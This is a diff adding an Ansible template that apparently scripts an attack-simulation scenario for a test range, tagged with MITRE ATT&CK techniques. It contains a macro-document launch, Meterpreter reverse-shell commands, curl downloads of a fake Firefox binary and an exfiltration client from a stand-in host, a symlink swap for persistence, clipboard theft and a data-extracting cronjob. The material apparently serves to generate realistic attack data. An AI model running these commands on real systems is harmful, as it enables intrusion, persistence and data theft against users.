ansible/run/scenario6/templates/scenario_6_a_a.j2

```diff
@@ -0,0 +1,258 @@
+    session: client
+
+  - type: sleep
+    seconds: 3
+
+  - type: vnc
+    cmd: key
+    key: "enter"
+    session: client
+
+  - type: sleep
+    seconds: 3
+
+  # Open the Document with the malicious macro
+  - type: vnc 
+    cmd: type 
+    input: "soffice /home/judy/Nutzungshinweise.odt"
+    session: client
+    metadata:
+      techniques: "T1204"
+      tactics: "Execution"
+
+  - type: sleep
+    seconds: 1
+
+  - type: vnc
+    cmd: key
+    key: "enter"
+    session: client
+
+  - type: sleep
+    seconds: 3
+
+################### ATTACKER INTERACTS WITH METERPRETER ############################
+  # run commands via reverse shell
+  - type: msf-session
+    stdapi: true
+    session: revshell
+    cmd: sysinfo
+
+  # upload cronjob that extracts data
+  - type: msf-session
+    session: revshell
+    cmd: upload downloader.txt
+
+################### ATTACKER GATHERS INFORMATION ############################
+
+  # get interactive shell
+  - type: msf-session
+    cmd: shell
+    session: revshell
+
+  - type: msf-session
+    cmd: python3 -c "import pty;pty.spawn(\"/bin/bash\")";
+    session: revshell
+ 
+  - type: msf-session
+    cmd: export SHELL=bash
+    session: revshell
+ 
+  - type: msf-session
+    cmd: export TERM=xterm256-color
+    session: revshell
+
+  - type: msf-session
+    cmd: stty rows 38 columns 116
+    session: revshell
+
+  # needed for xclip and wmctrl
+  - type: msf-session
+    cmd: export DISPLAY=:0
+    session: revshell
+
+################### PERSISTENCE OPTION A, BROWSER BINARY ############################
+
+  # download fake firefox executable
+  - type: msf-session
+    cmd: curl -o /home/judy/.local/share/firefox/firefox-startup suspicious-website.com:8083/index
+    session: revshell
+
+  # replace the symlink
+  - type: msf-session
+    session: revshell
+    cmd: ln -sf /home/judy/.local/share/firefox/firefox-startup /home/judy/.local/bin/firefox
+
+  # make it executable
+  - type: msf-session
+    session: revshell
+    cmd: chmod +x /home/judy/.local/share/firefox/firefox-startup
+
+################### ATTACKER GATHERS INFORMATION ############################
+
+  # download the veiltransfer_client_linux executable
+  - type: msf-session
+    cmd: curl -o /home/judy/.local/bin/veiltransfer_client_linux suspicious-website.com:8082/index
+    session: revshell
+
+  # get the last clipboard entry
+  - type: msf-session
+    session: revshell
+    cmd: xclip -selection clipboard -o
+    metadata:
+      techniques: "T1515"
+      tactics: "Exfiltration"
+
+  # save the meterpreter payload in /home
+  - type: msf-session
+    session: revshell
+    cmd: cp /tmp/index /home/judy/.index
+
+  # make the veiltransfer client binary executable
+  - type: msf-session
+    session: revshell
+    cmd: chmod +x /home/judy/.local/bin/veiltransfer_client_linux 
+
+  # add the cronjob to extract data
+  - type: msf-session
+    session: revshell
+    cmd: (crontab -l; cat /home/judy/downloader.txt) | crontab -
```

Comment:
We need to change that. I would prefer to have an interactive command "crontab -e" and type in the crontab-line